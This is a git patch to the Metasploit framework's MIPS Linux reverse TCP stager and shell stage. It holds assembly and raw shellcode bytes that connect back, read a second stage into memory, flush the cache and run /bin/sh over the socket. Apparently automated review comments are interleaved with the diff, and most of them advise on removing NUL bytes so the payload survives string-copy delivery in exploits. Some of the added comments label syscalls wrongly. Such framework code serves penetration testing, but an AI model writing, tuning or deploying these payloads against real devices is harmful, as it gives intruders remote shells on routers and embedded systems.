From a056d937e7f03c463b9c5d056997eff648404039 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 14 Jan 2014 14:06:01 -0600
Subject: [PATCH] Fluch data cache and improve documentation

---
 .../shellcode/linux/mips/stage_tcp_shell.s | 4 +++-
 .../linux/mipsbe/stager_sock_reverse.s | 18 +++++++++++++++++-
 .../linux/mipsle/stager_sock_reverse.s | 18 +++++++++++++++++-
 .../stagers/linux/mipsbe/reverse_tcp.rb | 2 ++
 .../stagers/linux/mipsle/reverse_tcp.rb | 2 ++
 5 files changed, 41 insertions(+), 3 deletions(-)

diff --git a/external/source/shellcode/linux/mips/stage_tcp_shell.s b/external/source/shellcode/linux/mips/stage_tcp_shell.s
index f9c6826223..bbe9086fe5 100644
--- a/external/source/shellcode/linux/mips/stage_tcp_shell.s
+++ b/external/source/shellcode/linux/mips/stage_tcp_shell.s
@@ -41,6 +41,7 @@ main:
 # dup2(sockfd, 0)
 # a0: oldfd (sockfd)
 # a1: newfd (2, 1, 0)
+ # v0: syscall = __NR_dup2 (4063)
 li $s1, -3
 nor $s1, $s1, $zero
 add $a0, $s2, $zero
@@ -50,12 +51,13 @@ dup2_loop:
 syscall 0x40404
 li $s0, -1
 addi $s1, $s1, -1
- bne $s1, $s0, dup2_loop #
+ bne $s1, $s0, dup2_loop #
 
 # execve("/bin/sh", ["/bin/sh"], NULL)
 # a0: filename "/bin/sh"
 # a1: argv ["/bin/sh", NULL]
 # a2: envp NULL
+ # v0: syscall = __NR_dup2 (4011)
 li $t8, -1 # load t8 with -1
 getaddr: # getaddr trick from scut@team-teso.net
 bltzal $t8, getaddr # branch with $ra stored if t8 < 0
diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
index 2edc183001..9aba45eea7 100644
--- a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
@@ -13,7 +13,7 @@
 #
 # Description:
 #
- # Implementation of a MIPS LE Linux reverse TCP stager.
+ # Implementation of a MIPS BE Linux reverse TCP stager.
 #
 # File descriptor in $s2.
 #
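Review bot: The new comment in the execve block, `# v0: syscall = __NR_dup2 (4011)`, labels the wrong syscall: 4011 is the MIPS o32 number for execve, and the `__NR_dup2 (4063)` comment added in the previous hunk already covers dup2. Change it to `# v0: syscall = __NR_execve (4011)` so the two annotations do not contradict each other. The `li $v0` this comment describes is below the hunk, so I am inferring its value from the execve header comment rather than from a visible line. The `main` body starts before this hunk and continues after it.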
@@ -53,6 +53,7 @@ main:
 # a0: sockfd
 # a1: addr = AF_INET (2)
 # a2: addrlen = 16
+ # v0: syscall = __NR_connect (4170)
 lw $a0, -4($sp)
 li $t7, -3
 nor $t7, $t7, $zero
@@ -75,6 +76,7 @@ main:
 # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
 # sp(16): fd = -1
 # sp(20): offset = 0
+ # v0: syscall = __NR_mmap (4090)
 li $a0, -1
 li $a1, 4097
 addi $a1, $a1, -1
@@ -95,12 +97,26 @@ main:
 # a0: sockfd
 # a1: addr
 # a2: len = 4096
+ # v0: syscall = __NR_read (4003)
 lw $a0, -4($sp)
 lw $a1, -8($sp)
 li $a2, 4097
 addi $a2, $a2, -1
 li $v0, 4003
 syscall 0x40404
+
+ # cacheflush(addr, nbytes, DCACHE)
+ # a0: addr
+ # a1: nbytes
+ # a2: cache = DCACHE (2)
+ # v0: syscall = __NR_read (4147)
+ lw $a0, -8($sp)
+ add $a1, $v0, $zero
+ li $t1, -3
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $v0, 4147
+ syscall 0x40404
 
 # jmp to the stage
 lw $s1, -8($sp)
diff --git a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
index ac6863afb9..42083452af 100644
--- a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
@@ -53,6 +53,7 @@ main:
 # a0: sockfd
 # a1: addr = AF_INET (2)
 # a2: addrlen = 16
+ # v0: syscall = __NR_connect (4170)
 lw $a0, -4($sp)
 li $t7, -3
 nor $t7, $t7, $zero
@@ -75,6 +76,7 @@ main:
 # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
 # sp(16): fd = -1
 # sp(20): offset = 0
+ # v0: syscall = __NR_mmap (4090)
 li $a0, -1
 li $a1, 4097
 addi $a1, $a1, -1
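Review bot: `add $a1, $v0, $zero` in the new cacheflush block assembles to 0x00402820 (rs is $v0, register 2, so the top byte of a SPECIAL-opcode word is 0x00), which introduces a NUL byte into a stager whose other instructions are visibly built with the `li 4097; addi -1` and `li -3; nor` tricks to avoid exactly that; the mipsbe reverse_tcp.rb hunk in this patch shows it as `\x00\x40\x28\x20`. It also ties the flush length to read()'s return value, which is -1 on error and smaller than the stage on a short read, and the stager jumps into the page regardless. Building the length the same way the mmap and read arguments are built, `li $a1, 4097` followed by `addi $a1, $a1, -1`, flushes the whole 4096-byte page, is NUL-free and matches the file's idiom. Separately, the comment `# v0: syscall = __NR_read (4147)` should read `# v0: syscall = __NR_cacheflush (4147)`. The `main` body starts before this hunk and continues after it.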
@@ -95,16 +97,30 @@ main:
 # a0: sockfd
 # a1: addr
 # a2: len = 4096
+ # v0: syscall = __NR_read (4003)
 lw $a0, -4($sp)
 lw $a1, -8($sp)
 li $a2, 4097
 addi $a2, $a2, -1
 li $v0, 4003
 syscall 0x40404
+
+ # cacheflush(addr, nbytes, DCACHE)
+ # a0: addr
+ # a1: nbytes
+ # a2: cache = DCACHE (2)
+ # v0: syscall = __NR_read (4147)
+ lw $a0, -8($sp)
+ add $a1, $v0, $zero
+ li $t1, -3
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $v0, 4147
+ syscall 0x40404
 
 # jmp to the stage
 lw $s1, -8($sp)
- lw $s2, -4($sp)
+ lw $s2, -4($sp) # sockfd saved on $s2
 jalr $s1
 
 .set macro
diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
index 7bd9d256d4..4dd0c08440 100644
--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -45,6 +45,8 @@ module Metasploit3
 "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
 "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
 "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
+ "\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
+ "\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
 "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
 "\xf8\x09"
 }
diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
index 9e57739329..9b123da4bb 100644
--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -45,6 +45,8 @@ module Metasploit3
 "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
 "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
 "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
+ "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
+ "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
 "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
 "\x20\x02"
 }
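Review bot: The same `add $a1, $v0, $zero` added here encodes as 0x00402820 and so carries a NUL byte, which the mipsle reverse_tcp.rb hunk in this patch shows as `\x20\x28\x40\x00`; every other instruction visible in this stager is written NUL-free, so this looks unintended. Replacing it with the pair the read length already uses, `li $a1, 4097` and `addi $a1, $a1, -1`, keeps the stager NUL-free and also stops the flush length from depending on read()'s return value, which is -1 when the read fails. The comment `# v0: syscall = __NR_read (4147)` should say `__NR_cacheflush (4147)`. One thing to confirm rather than a defect: the cache argument is DCACHE (2), while BCACHE (3) is the value that also covers the instruction cache for freshly written code; whether the kernel treats the two differently for this call is worth checking before relying on it. The `main` body starts before this hunk.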
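Review bot: The first added line contains `\x00\x40\x28\x20`, the big-endian encoding of `add $a1, $v0, $zero` from stager_sock_reverse.s, and it is the only NUL byte in the visible part of this stager, so a delivery path that copies the stager as a C string would truncate it right before the cacheflush length is set. Either regenerate the blob after replacing that instruction in the assembly source with a NUL-free form (the `li $a1, 4097` / `addi $a1, $a1, -1` pair already used for the read length encodes as `\x24\x05\x10\x01\x20\xa5\xff\xff`), or state in the module metadata that this payload is no longer NUL-free. The enclosing hash literal starts and ends outside this hunk.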
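Review bot: `\x20\x28\x40\x00` on the first added line is the little-endian encoding of `add $a1, $v0, $zero` and introduces the only NUL byte visible in this stager blob, which matters for any exploit that delivers the stager through a string-copy primitive. If the assembly is changed to the NUL-free `li $a1, 4097` / `addi $a1, $a1, -1` pair, the corresponding little-endian bytes are `\x01\x10\x05\x24\xff\xff\xa5\x20`; the blob should be regenerated from the source rather than patched by hand. The enclosing hash literal starts and ends outside this hunk.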